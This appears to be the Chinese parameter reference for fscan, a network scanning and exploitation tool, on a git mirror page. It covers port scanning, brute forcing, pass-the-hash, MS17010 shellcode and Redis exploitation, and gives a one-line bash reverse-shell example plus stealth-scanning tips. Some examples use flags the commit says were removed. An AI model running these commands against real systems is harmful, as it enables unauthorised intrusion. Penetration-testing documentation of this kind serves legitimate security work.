mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-09-14 14:06:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity
78f81610cd
fscan/PARAMETERS.md
ZacharyZcR f943f04de7 refactor: 精简命令行参数提升用户体验 
移除冗余和低频使用的参数:
- 移除 -ping 参数,统一使用 -np 控制存活检测
- 移除 -top 参数,改为智能计算显示数量
- 移除 -np-bar, -slow, -sp 调试参数
- 重构 -pg 为 -nopg,简化进度条控制逻辑

主要变更:
- 将进度条控制从默认开启改为默认显示,使用 -nopg 禁用
- 实现智能TOP计算,根据扫描规模自动调整显示数量
- 统一参数命名风格,提高易用性
- 完善参数文档,新增 PARAMETERS.md

影响:
- 简化了用户界面,减少参数学习成本
- 保持核心功能不变,提升使用体验
- 移除功能重复和混淆的参数选项
2025-08-07 07:18:32 +08:00

9.0 KiB
Raw Blame History

Fscan 参数完整文档

版本: 2.0.2
更新日期: 2025-01-06

📋 目录

🎯 目标配置参数

参数 类型 默认值 描述 示例
-h string - 目标主机: IP, IP段, 域名 -h 192.168.1.1
-hf string - 主机文件路径 -hf hosts.txt
-eh string - 排除主机列表 -eh 192.168.1.1,192.168.1.2
-p string 常用端口 扫描端口: 单个端口、范围或列表 -p 80,443,1-1000
-pf string - 端口文件路径 -pf ports.txt
-ep string - 排除端口列表 -ep 80,443

端口格式说明

  • 单个端口: 80
  • 端口列表: 80,443,3389
  • 端口范围: 1-1000
  • 组合使用: 22,80,443,8080-8090
  • 默认端口组: 21,22,23,80,81,110,135,139,143,389,443,445,502,873,993,995,1433,1521,3306,5432,5672,6379,7001,7687,8000,8005,8009,8080,8089,8443,9000,9042,9092,9200,10051,11211,15672,27017,61616

⚙️ 扫描控制参数

参数 类型 默认值 描述 示例
-m string all 扫描模式: all, portscan, tcpscan等 -m portscan
-t int 600 端口扫描线程数 -t 1000
-time int 3 端口扫描超时时间(秒) -time 5
-mt int 10 模块线程数 -mt 20
-gt int 180 全局超时时间(秒) -gt 300
-np bool false 禁用ping探测 -np
-fingerprint bool false 启用服务指纹识别 -fingerprint
-local bool false 本地扫描模式 -local

扫描模式说明

  • all (默认): 完整扫描 (端口+服务+漏洞)
  • portscan: 仅端口扫描
  • tcpscan: TCP端口扫描
  • udpscan: UDP端口扫描
  • icmp: ICMP存活探测
  • 自定义模式: 可指定特定插件名称

🔐 认证与凭据参数

参数 类型 默认值 描述 示例
-user string - 用户名 -user admin
-pwd string - 密码 -pwd password123
-usera string - 额外用户名列表 -usera "admin,root,test"
-pwda string - 额外密码列表 -pwda "123456,password"
-userf string - 用户名字典文件 -userf users.txt
-pwdf string - 密码字典文件 -pwdf passwords.txt
-domain string - SMB域名 -domain COMPANY
-hash string - 哈希值 (用于哈希传递攻击) -hash ntlmhash
-hashf string - 哈希文件 -hashf hashes.txt
-sshkey string - SSH私钥文件路径 -sshkey ~/.ssh/id_rsa

🌐 Web扫描参数

参数 类型 默认值 描述 示例
-u string - 目标URL -u http://example.com
-uf string - URL文件 -uf urls.txt
-cookie string - HTTP Cookie -cookie "session=abc123"
-wt int 5 Web请求超时时间(秒) -wt 10
-proxy string - HTTP代理 -proxy http://127.0.0.1:8080
-socks5 string - SOCKS5代理 -socks5 127.0.0.1:1080

🔍 POC测试参数

参数 类型 默认值 描述 示例
-pocname string - 指定POC名称 -pocname "weblogic"
-pocpath string - 自定义POC路径 -pocpath ./mypocs/
-nopoc bool false 禁用POC扫描 -nopoc
-full bool false 全量POC扫描 -full
-num int 20 POC并发数 -num 50
-dns bool false DNS日志记录 -dns

📡 Redis利用参数

参数 类型 默认值 描述 示例
-rf string - Redis公钥文件 -rf ~/.ssh/id_rsa.pub
-rs string - Redis反弹Shell -rs "bash -i >&/dev/tcp/ip/port 0>&1"
-noredis bool false 禁用Redis扫描 -noredis
-rwp string - Redis写入路径 -rwp /tmp/
-rwc string - Redis写入内容 -rwc "malicious content"
-rwf string - Redis写入文件 -rwf ./payload.txt

🔓 暴力破解控制参数

参数 类型 默认值 描述 示例
-nobr bool false 禁用暴力破解 -nobr
-retry int 3 连接失败最大重试次数 -retry 5

📤 输出与显示控制参数

参数 类型 默认值 描述 示例
-o string result.txt 输出文件路径 -o scan_results.txt
-f string txt 输出格式: txt, json, csv -f json
-no bool false 禁用结果保存 -no
-silent bool false 静默模式 -silent
-nocolor bool false 禁用颜色输出 -nocolor
-log string BASE_INFO_SUCCESS 日志级别 -log ALL
-nopg bool false 禁用进度条 -nopg

日志级别说明

  • ALL: 显示所有日志
  • ERROR: 仅显示错误
  • BASE: 基础信息
  • INFO: 详细信息
  • SUCCESS: 成功结果
  • DEBUG: 调试信息
  • BASE_INFO_SUCCESS (默认): 基础+信息+成功

🔧 其他参数

参数 类型 默认值 描述 示例
-sc string - Shellcode (用于MS17010等) -sc shellcode.bin
-lang string zh 语言设置: zh, en -lang en
-help bool false 显示帮助信息 -help

💡 使用示例

基础扫描示例

# 1. 基础主机扫描
fscan.exe -h 192.168.1.1

# 2. 网段扫描
fscan.exe -h 192.168.1.0/24

# 3. 指定端口扫描
fscan.exe -h 192.168.1.1 -p 80,443,8080

# 4. 端口范围扫描
fscan.exe -h 192.168.1.1 -p 1-1000

# 5. 从文件读取目标
fscan.exe -hf targets.txt -p 80,443

高级扫描示例

# 6. 服务指纹识别
fscan.exe -h 192.168.1.1 -fingerprint

# 7. 完整扫描 (包括POC)
fscan.exe -h 192.168.1.1 -full

# 8. 静默模式扫描
fscan.exe -h 192.168.1.1 -silent -o results.json -f json

# 9. 高性能扫描
fscan.exe -h 192.168.1.0/24 -t 1000 -time 1 -np

# 10. Web应用扫描
fscan.exe -u http://example.com -full

认证扫描示例

# 11. SMB扫描带认证
fscan.exe -h 192.168.1.1 -user administrator -pwd password -domain COMPANY

# 12. SSH密钥认证
fscan.exe -h 192.168.1.1 -sshkey ~/.ssh/id_rsa

# 13. 暴力破解扫描
fscan.exe -h 192.168.1.1 -userf users.txt -pwdf passwords.txt

# 14. 禁用暴力破解
fscan.exe -h 192.168.1.1 -nobr

特殊用途示例

# 15. Redis利用
fscan.exe -h 192.168.1.1 -rf ~/.ssh/id_rsa.pub

# 16. 代理扫描
fscan.exe -h 192.168.1.1 -proxy http://127.0.0.1:8080

# 17. 指定POC测试
fscan.exe -h 192.168.1.1 -pocname weblogic

# 18. 仅端口扫描
fscan.exe -h 192.168.1.1 -m portscan

🏆 最佳实践

🚀 性能优化

# 高性能内网扫描
fscan.exe -h 192.168.1.0/24 -t 1000 -time 1 -np -nobr

# 快速端口发现
fscan.exe -h target -m portscan -t 2000 -time 1

# 轻量级服务识别
fscan.exe -h target -fingerprint -nobr -nopoc

🛡️ 隐蔽扫描

# 慢速扫描避免检测
fscan.exe -h target -t 10 -time 10 -slow

# 通过代理扫描
fscan.exe -h target -proxy http://proxy:8080 -t 50

📊 结果输出

# JSON格式便于处理
fscan.exe -h target -f json -o results.json

# 静默模式仅保存结果
fscan.exe -h target -silent -o results.txt

# 详细日志调试
fscan.exe -h target -log ALL -sp

🎯 针对性扫描

# Web应用专项
fscan.exe -u http://target -full -cookie "session=xxx"

# 数据库专项
fscan.exe -h target -p 1433,3306,5432,6379 -fingerprint

# Windows主机专项
fscan.exe -h target -p 135,139,445,3389 -domain COMPANY

⚠️ 注意事项

  1. 性能调优:

    • 内网扫描可使用 -t 1000 提高速度
    • 互联网扫描建议 -t 100 避免被限制

  2. 权限要求:

    • ICMP需要管理员权限
    • 某些端口扫描可能需要提升权限

  3. 网络环境:

    • 防火墙可能影响扫描结果
    • 代理环境下注意配置 -proxy-socks5

  4. 法律合规:

    • 仅在授权环境下使用
    • 遵守相关法律法规

📞 技术支持: https://fscan.club
🐛 问题反馈: GitHub Issues